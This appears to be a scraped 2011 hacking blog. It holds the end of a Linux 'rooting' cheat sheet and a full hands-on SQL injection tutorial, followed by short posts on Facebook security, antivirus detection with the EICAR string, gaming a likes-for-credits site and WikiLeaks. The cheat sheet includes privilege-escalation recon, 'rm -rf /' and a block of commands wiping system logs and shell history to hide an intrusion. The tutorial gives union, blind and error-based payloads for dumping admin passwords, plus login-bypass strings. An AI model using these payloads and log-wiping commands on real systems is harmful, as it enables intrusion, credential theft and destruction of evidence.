in /etc/sudoers.
id - Tells you what user your logged in as.
which wget curl w3m lynx - Check's to see what downloaders are
present.
uname -r - Shows all release info (or) cat /etc/release.
uname -a - Shows all kernal info (or) cat /etc/issue
last -30 - Last logged 30 ip's can change to desired number.
useradd - Create new user account.
usermod - Modify user account.
w - See who is currently logged on.
-13-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
locate password.txt - Locates password.txt in current dur can use *.
rm -rf / - Please be carefull with this command, i cannot stress this
enough.
arp -a - Lists other machines are on the same subnet.
lsattr -va - ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all writable files and folders.
find . -perm -2 -ls - Finds all writable files and folders in current dir.
find / -type f -name .bash_history - Finds bash history.
netstat -an | grep -i listen - shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo - Cpu info.
locate gcc- Finds gcc if installed.
set - Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf - Log file.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null - Find writable files.
chmod ### $folder - Chmod folder.
-14-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
ls -l -b - Verbosly list directory's
-------------clear-logs-----------------
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
-------------------------------------------------
cat filename | more
^ Pipe large files through more for easy reading
ifconfig | grep Addr
^ Get the local Internet Protocol and Hardware address(s) for your machine
cat binary | awk "{print $5}"
^ Print a binary file out in hex
$(echo "HEAD / HTTP/1.0";echo "";echo "") | telnet host 80
^ Get the webserver type and identification
The best feature of bash is piping. Piping means threading the output of one
program to another. For example you can do ls | more to pipe the output of
ls to more and easily read the contents of large directories. You can also do
ls | grep myfile to find myfile in the current directory.
cd /;find | grep goodfile
^ Search the entire FileSystem for a file called goodfile
su -x "command"
^ Run a command as root
sudo command
^ Run a command as a su-uid user
chmod a+rwx file
^ Change the permissions of a file and make it executable, readable, and writable to all users
rm removes a file only if the user deleting it has permissions to that file.
rm -f removes a file forcibly (permissions still apply).
rm -rf recursively and forcefully remove a directory. You should know about permissions by
now.
##################################################################################


This is the end of my this paper, Hope you enjoyed it. :)
# Greetz- C00lt04d,Cyb3Rgr00f,Cyb3Rs4m,Bad Man,h4ck0lic,Reborn, 3thicaln00b,Br0wnSug4r & All
my friends. ;)
## References ##
# Indishell.in
# Academy Of Hacking- http://www.orkut.co.in/Community?cmm=43323325
# Google :)
##################################################################################

MYSQL & MSSQL INJECTION

You all will be glad to know that a 14 year old friend of mine submitted awesome whitepaper on mysql&mssql injections


#####################################################################
# Title: Advanced Sql Injection including Mysql,Mssql & a guide to oracle
# Date : 22 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t@yahoo.in
# Facebook: fb.me/yoShubH
# My Teams : Indishell,IW,AoH,SWATS,Team StuXnet etc.
# Contents-

=> Mysql- Blind + union
=> Mssql- Blind + Union + error based
// => For oracle plz refer tohttp://
dl.packetstormsecurity.net/papers/database/Hacking_Oracle_From_Web_2.pdf :)
# Suggested Automated tools-
=> Havij: itsecteamc.com
# Vulnerability scanners
=> Acunetix wvs
=> Jsky
==========================================================================================
Hmmm... So Let's Start, I think it's my first paper being written for you all ;) I don't
remember the exact definition of sql Injection so
I'll get that for you from google ;)
Q. What is Sql Injection ?
A. SQL injection is a code injection technique that exploits a security vulnerability
occurring in the database layer of an application.
I don't want to boar you ;) so a simple short definiton is above..
Types of Sql Injection-
# Blind
# Union
# Error //not availble in mysql
Google them to get the definitions :)..!
Injection types-
# String- http://test.com/index.php?id=1 having 1=1
# Integer- http://test.com/index.php?id='1 having 1=1
hope you can see the difference.
Server types I know & I'll teach you-
# Mysql
# Mssql
===========================================================================================
###########################################################################################
Let's start with Mysql:
-1-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
Mysql has 2 types only as mentioned above.you need to know the following things about the DB
you are attacking-
# Number of columns
# Table names
# column names
# Let's start with union Attack, the most common, every n00b should no it :p-
=> http://test.com/index.php?id=1 order by 10--
^ This gives me an error
Let's again try
=> http://test.com/index.php?id=1 order by 7--
^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5--
Whoa !! the page is Loading normally
It means, Number of columns => 5
you can do it with mssql as well.
# Now the next part-
I'm using union select statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't gives you anything, change the first part of the query to a negative value.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on you screen. In my case it is 2. Now we know that column 2 will
echo data back to us. :D
# getting Mysql version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get with this try this-
=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5--
Now you will get get the version name
it can be-
# 5+
# 5>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Table extraction for version 5+ :
-2-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from
information_schema.tables--
It'll show a lot of tables, if you want to get into the site, usually you need to get the
admin's login info :D
So, In my case I need to exploit into a table named => admin
which contains information, I need :D
Now I got the Tables names & I need to extract the column names from them so the query will
be-
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from
information_schema.columns where table_name=admin--
This will show you the column names inside the table Admin. if it gives you an error you
need to change the text value of admin to mysql char.
I use hackbar, a Firefox addon to do so.
so char of admin is =>CHAR(97, 100, 109, 105, 110)
therefore the query will be-
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from
information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
It show the columns names to me. In my case they are-
# user_name
# user_password
# sex
# uid
We only need to know username & pass so we reject the rest two. Okay ? :D
The next query will be for extracting the final data I need- :D
=> http://test.com/index.php?id=-1 union all select
1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
where 0x3a is the hex value of => :
VOILA !
I got the username & pass, it is => shubham:password
password can also be encrypted. So you can use few online decrypters or a software I know =>
Password Pro
This was all for Mysql 5+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Let's Start with mysql 5>
Version 4 or below 5 does not contain any => Information_schema
-3-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
so you have to guess them, Like people guess while playing KBC (who want to be a millionaire)
hahaha :D
we know the number of columns that is 5.
=> Let's Start guessing the table:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ This one gives me error
=> => http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Voila I guessed the right, you must be thinking ShubhaM is a Genious xD :p
=> Next part is Guessing the columns:
as we had done earlier & had found the vulnerable column is 2...so lets process further.
guess something similar to a username.
=> http://test.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got error. Retrying...
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
Hurray ! It gotta work baby & I got the username :D...!
=> let's guess the password column now
=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error
one more try-
=> http://test.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--
hahaha...got the pass !!!
This is the end of Mysql 5> union.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
# Mysql Blind-
Most fu*king part. I really hate this. :X :P :X
Q. what is Blind Sql Injection ?
A. Blind SQL Injection is used when a web application is vulnerable to an SQL injection but
the results of the injection are not visible to the attacker. The page with the
vulnerability may not be one that displays data but will display differently depending on
the results of a logical statement injected into the legitimate SQL statement called for
that page. This type of attack can become time-intensive because a new statement must be
crafted for each bit recovered. There are several tools that can automate these attacks once
the location of the vulnerability and the target information has been established.
-4-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
^ copied it from wikipedia ;)
hope you understood. huh !! its 1:11am here in India...I'm very tired :'( :P :P but no
school tommorow coz it is sunday :D
Let's come to the point, enough of fun now !!
# when we want to test for mysql blind-
=> http://test.com/news.php?id=5 and 1=1
^ this is always trues :D & page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is Fake :X
so if some text, picture or some content is missing on returned page then that site is
vulrnable to blind sql injection.
# Getting Mysql version in blind sqlito
get the version in blind attack we use substring
i.e
=> http://test.com/news.php?id=5 and substring(@@version,1,1)=4
# this should return TRUE if the version of MySQL is 4.
# replace 4 with 5, and if query return TRUE then the version is 5.
# Test if subselect works
when select don't work then we use subselect
i.e
=> http://test.com/news.php?id=5 and (select 1)=1
# if page loads normally then subselects work.
Now, :D Let's see if we have access to => Mysql.user
=> http://test.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password
usign load_file() function and OUTFILE.
# Check table and column names
# This is part when guessing of the game KBC works :D :))
that is,
=> http://test.com/news.php?id=5 and (select 1 from users limit 0,1)=1
-5-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row,
this is very important.)
# then if the page loads normally without content missing, the table users exits.
# if you get FALSE (some article missing), just change table name until you guess the right
one :)
# let's say that I have found that table name is users, now what we need is column name !! :D
# The same as table name, we start guessing.
=> http://test.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users
limit 0,1)=1
#if the page loads normally we know that column name is password (if we get false then try
common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
# Pull data from database
I found table users i columns username password so I'm gonna pull characters from that.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1
character into ascii value
# and then compare it with simbol greater then > .
# so if the ascii char greater then 80, the page loads normally. (TRUE)
# keep trying until get false.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing :D
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>98
TRUE again, higher :D
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>99
FALSE!!!
:D :D
# so the first character in username is char(99). Using the ascii converter we know that
-6-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
char(99) is letter 'c'.
=>> then let's check the second character.
# http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),2,1))>99
# Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the
second character, 1 character in lenght)
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>107
# FALSE, lower number.
=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>104
# TRUE, higher.
http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password)
from users limit 0,1),1,1))>105
# FALSE!!!
# we know that the second character is char(105) and that is 'i'. We have 'ci' so far
# so keep incrementing until you get the end. (when >0 returns false we know that we have
reach the end).
It is very very fucking boaring :P :'( :X
There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing
everything manually,
cause that makes you better INJ3CT0R :D
Finishing this Mysql part here. :P :P
next is mssql :P
==============================================================================================
========
##############################################################################################
##########
My head is paining like hell...I'll continue after few hours ;)
Lolz...I'm back after 24 hours :D
Mssql is the best part, I like it !! due to many reasons...everyn00b can't do it :P
I had learnt mssql injection from very good people like- Stranger(ICA),CWH Underground
-7-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
[www.milw0rm.com/author/1456] & a book given to be my friend d3c0mil3r etc.
# MSsql Injection-
Hope you know how to test sqli vulnerablity, So I'm leaving that part.
# Bypassing Authenctication- common for n00bs:
+-----------------------------+
| ' or 1=1 -- |
| a' or 1=1 -- |
| " or 1=1 -- |
| a" or 1=1 -- |
| ' or 1=1 # |
| " or 1=1 # |
| or 1=1 -- |
| ' or 'x'='x |
| " or "x"="x |
| ') or ('x'='x |
| ") or ("x"="x |
| ' or username LIKE '%admin% |
+-----------------------------+
| USERNAME: ' or 1/* |
| PASSWORD: */ =1 -- |
+-----------------------------+
| USERNAME: admin' or 'a'='a |
| PASSWORD: '# |
+-----------------------------+
=> Mssql Injection with Union Attacl:
I love Union <3
I've this site to test upon my power => http://test.com/news.asp?id=1
Ok, Let's Start-
# First find out the number of columns, counting one by one is boaring :P so I'll use "Hit &
Trial Method", that I had learnt somewhere in Maths :D
ok. => http://test.com/news.asp?id=1 order by 6--
We'll hit, until we get a error like this one-
[error] Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the select
list.
/showthread.asp, line 9
[/error]
again trying to hit,
=> http://test.com/news.asp?id=1 order by 4--
whoa !! worked :D
# Now I'll use union again-
-8-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,44--
# We will see "11" or "22" or "33" or "44" appeared on some point in returned page.
WOW ! i found 44 on my laptop's screen, so i'll replace 44 with @@version
=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,@@version--
^ So, this gives me the version Information.
Let's continue in grabbing the rest data, I'm using information_schema, as like we did in
Mysql :P
I think concat do not works in mssql, never tried also, if working also, I don't know how to
! :P coz I'm just a 10th std student. No idea abt sql :P
So the next,
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from
information_schema.tables--
^ this gives me the name of first table, i.e => threads
I'll use the first table to get the next one & so on...untill u get what u want
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from
information_schema.tables where table_name not in ('threads')--
^ This gives me the name of the next table, i.e.=> users :D
Users is the required table for me which contains the info I need :D
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users'--
^ this gives me the column name,i.e,uname. as we did to find the tables. same we'll do with
columns. Ok? :)
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users' and
column_name not in ('uname')--
^ this gives me the next column,i.e, upass :D
Lolz, now I need data from these two columns :D
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--
^ same with upass
this time my uname is admin. so to find next row, we do
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname
not in ('admin')--
further as well, we can extract the rest of the data. hope you understood this much !!
-9-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
Now next part is mssql blind :D
==============================================================================================
====
# Mssql blind :
# testing-
=> http://test.com/news.asp?id=1 and 1=1
another one => http://test.com/news.asp?id=1 and 1=2
If these two give different results that simply means that the fucking site is vulnerable to
Mssql blind :D :P :x
# I'm copy pasting some queries from my notes :P :D
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT
LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
^ your idea of picking the ascii code can be Different. :D :P
^ valid :(
hit it againhttp://
test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>120
^
in this case result will be like 1=2
next we try,
http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS
varchar(8000)),1,1)),0)>105
I tried with these-
# >112-Invalid
# >108-Valid
# >110-Invalid
# >109-Invalid
So therefore, ascii value is equal to => 109 :)
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT
LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109
Rest on your own...keep manipulating to get info :P
# Getting Table name- one of the hardest part, finding each character of table is really
boaring :P
use automated tools for this :P the queries are very complicated here :x
Let's start-
-10-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM
sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)>97
^ this one is used to get first character of first table.
second character:
=> http://test.com/news.asp?id-1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM
sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97
and so on....I'm not gonna dwell on it :P
# Getting column name-
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM
sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97
Change the table name to mssql char, example if it is users change it tochar(
117)+char(115)+char(101)+char(114)
# 2nd character-
=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT
(SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE
name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS
varchar(8000)),2,1)),0)>97
& so on....Now finishing this mssql blind.
==============================================================================================
=========================
### Mssql Error based-
Types-
# ODBC Error Message Attack with "HAVING" and "GROUP BY"
# ODBC Error Message Attack with "CONVERT"
# Soap (not including soap in this paper)
Let's start with
# ODBC Error Message Attack with "HAVING" and "GROUP BY"--->
I'll inject having command now,
=> http://test.com/news.asp?id=1 having 1=1--
getting some error...err
-11-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in
the select list because it is not contained in an aggreate function and there is no
GROUP BY clause.
[/error]
it shows table name is news & one column => news_id is contained in it :P
# combining having & group by
=> http://test.com/news.asp?id=1 GROUP BY news.news_id HAVING 1=1--
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid
in
the select list because it is not contained in an aggreate function and there is no
GROUP BY clause.
[/error]
it shows second column of first table is news_author :D
third column can be obtained using the 2nd one
=> http://test.com/news.asp?id=1 GROUP BY news.news_id,news.news_author HAVING 1=1--
[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid
in
the select list because it is not contained in an aggreate function and there is no
GROUP BY clause.
[/error]
third column is => news_detail
and so on...
Now,
## ODBC Error Message Attack with "CONVERT"-
here I'll show you how to grab, MSSQL_Version, DB_name, User_name.
=> http://test.com/news.asp?id=1+and+1=convert(int,@@version)--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 -
9.00.3042.00 (Intel X86) Feb 9 2007
22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT
5.2 (Build 3790: Service Pack 1)
-12-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
' to data type int.
/page.asp, line 9
[/error]
therefore I know => the version of MSSQL and OS (Windows 2003 Server)
other things u can grab by replacing @@version with-
# db_name()
# user_name()
if in the user name it gives => Sa
it means you can use Xp_cmdshell, that will I'll tell u later, to enable rdp i.e. remote
desktop & hack the whole box :P :D
# Obtaining tables-
=>
http://site.com/news.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_sche
ma.tables))--
Result is threads, so
Next one,
=>
http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_sche
ma.tables+where+table_name+
not+in+('threads')))--
& so now...you can continue further now.
Next table for me is users that i founded using the threads one..! So now i need columns
from the table threads, Okay ? :)
# Finding columns
=>
http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_sch
ema.columns+where+table_name='users'))--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
[/error]
First column is Uname ;)
So I continue
=>
http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_sch
ema.columns+where+table_name='users'+
and+column_name+not+in+('uname')))--
-13-
C:\Users\Ash\Desktop\Advaned Sql Injection in Mysql + Mssql.txt 24 January 2011 03:14
^ as we had done earlier :D
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
[/error]
For getting more column names,
we only append a known table list like that in getting table names.
# extracting data
=> http://test.com/news.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users))--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
[/error]
same with upass ;)
Rest you are now on your own In mssql ;)
I'm leaving it here....it is much of done !!! now the thing left is that to use your brain. ;)
# Soap Injection-
Leaving this part :P I'll later make a paper on it ;)
end of MSsql ... :P
# Xp_cmdshell
I'd recommend to use some automated tools, I'm not in mood of writing on xp_cmdshell, though
it consists of simple cmd commands to activate rdp & using net user u can add an account.
but complicated queries.
========================================================================
############################################################################################
# References-
# Hackforums.net
# www.hackersbay.in
# Academyofhacking.com
# Indishell.in
# packetstormsecurity.org
############################
Greetz To-
###
greetz- C00lt04d,Cyb3rgr00f,Reb0rn,c0d3br34k3r,3thicaln00b,Cyb3rS4m,g00gl3 w4rri0r & All my
friends at AOH & Indishell.
special thanks- H4ck0lic, Bad Man :)
##########################################################################################


download link for pdf

Wednesday, 26 January 2011

Facebook unveils security tools after Zuckerberg's page hacked

Facebook today announced two new security measures -- wider use of HTTPS and the introduction of "social authentication" -- less than 24 hours after the Facebook page of company founder Mark Zuckerberg was defaced by a hacker.

A blog post by Facebook's Alex Rice ties the security announcement to Friday being "Data Privacy Day," but the press and bloggers are having a high time connecting the news and Zuckerberg's victimization, whether or not there is actually any connection.

The first new security measure involves expanding the use of HTTPS -- Hypertext Transfer Protocol Secure -- beyond password exchanges.

Rice writes: "Starting today we'll provide you with the ability to experience Facebook entirely over HTTPS. You should consider enabling this option if you frequently use Facebook from public Internet access points found at coffee shops, airports, libraries or schools. The option will exist as part of our advanced security features, which you can find in the 'Account Security' section of the Account Settings page."

The second measure is a captcha-like authentication mechanism that instead of relying on illegible printed words employs photographs of a Facebook user's own friends.
Rice continues: "Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication. We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don't know who your friends are."
Meanwhile, Facebook has remained officially mum regarding yesterday's apparent hacking incident that saw someone insert a message onto Zuckerberg's Facebook fan page, which has attracted 2.8 million Facebook users. While it was removed relatively quickly, some 1,800 of those users managed to "like" the page and more than 400 left comments beforehand. The message read:
"Let the hacking begin: If facebook needs money, instead of going to the banks, why doesn't Facebook let its users invest in Facebook in a social way? Why not transform Facebook into a 'social business' the way Nobel Price [sic] winner Muhammad Yunus described it? #hackercup2011"

As of this writing, Zuckerberg's page remains disabled.

How Antivirus Software identifies threats

Most of us are aware how Antivirus Works and updates. As ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer. Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works and updates.


An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs.

1. Signature-based detection – Dictionary based
2. Heuristic-based detection – Suspicious behavior based

1. Signature-based detection – Dictionary based

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk.

As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants, so that the virus can be analyzed and the signature can be added to the dictionary.

More and regular the updates more secure we are.

2. Heuristic-based detection Suspicious behavior based

Heuristic-based detection involves identifying suspicious behavior from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software’s to identify new malware and variants of known malware. Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

File emulation- This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.

How to check your anti virus weather it does the work you haired it for?

European Institute of Computer Antivirus Research – EICAR Test makes it easy. It is a common test and most of us can perform it right now!
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
EICAR Test Code:
1

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to mynewfile.com
3. Now run the antivirus scan on this mynewfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise find a new one.

Tuesday, 25 January 2011

GET TWITTER FOLLOWERS, FACEBOOK LIKES & WEBSITE VISITORS



here's a website where you can get Twitter followers, Facebook likes & Website visitors [ Helps keepin CTR low ]

You'll be gettin above things for CREDITS in their language .. which you'll get when you follow other, like someones page or visit someones website ! Which is pretty easy Oui

Now comes the tricky part
Create your account & then Go Here

• Enter the following vouchers one by one

Quote:Voucher codes – codes will be emailed to those who reply in this topic




You'll get 175 credits by doing so !

• Then sign up for the Feed for 100 Credits [ You'll need to confirm email ]

Now you have 275 credits for free, by which you can get about 200 visits from 1 account

You can repeat the same process by using Proxy, creating another account,Vouchers,Sign up for Feed and keep getting Likes, Followers & Visits Biggrin

Ps - Use proxy when creating another account, otherwise it won't accept voucher codes

if you want to purchase facebook fans.. try buying facebook fans from the site mahakal infotech

Monday, 24 January 2011

Backtrack vs Windows 7

I was watching some video presentations and luckily i found this one :)
this is vocal difference between windows 7 vs backtrack a bit on funny side but worth watching...


Saturday, 22 January 2011

WIKILEAKS HIRING HACKERS

Hey Niggas , Wondering While u read, Everything is truth, As u r seeing it..Believe..! We all have been known that WIKILEAKS has Tored the Fake face of America, And America Tryin To DDOS the Wikileaks And Successfully have done it..!! now www.wikileaks.org has been moved to mirror.wikileaks.org,
“JULIAN ASSANGE IS THE ONE MAN ARMY I GOTTA SAY” Wikileaks has Showcased all the Drama of United States




Few Revealled Stuffs by WIKILEAKS:
1. IRAQ WAR LOGS
2. Calling tha Bessst World leaders in a NICK NAME.
3. Intruded in all governments Personal Stuff.
4. Spying on all Countries activites
5. SRILANKA WAR LOGS AGAINST Tamilian

Like all the Secrets has been revelaed With facts and Proffs,

Wikileaks Officialy Said Still they are having 2.5 Laks Of Confidential Notes From U.S Embassey
Hilary Clinton also warned there should not be Any post Regarding About one Secrets, If IT Happpens, Will be taken Series Account Leads to immediate action, (Ho HILARY am jus Askin Do u think Julian Assange(WIKILEAKS TEAM) India Or Wat…Watever u Say, To Nodding up Head Right and left)
This is WIKILEAKS..
Lets See Wat the steps Has taken Still So Far..
This Case has Been Movved To F.B.I , With Few Hired Hackers And Security Proff They DDosed And Main Site Has Been Shut Down…!! But Mirror Site (Backup Site) is still Active Upon now ..!!




( EVERYDNS.NET ) Wikileaks Has been hosted by this Provider F.B.I Forced to remove the Registration Entries..And Finally they Acted Upon..!
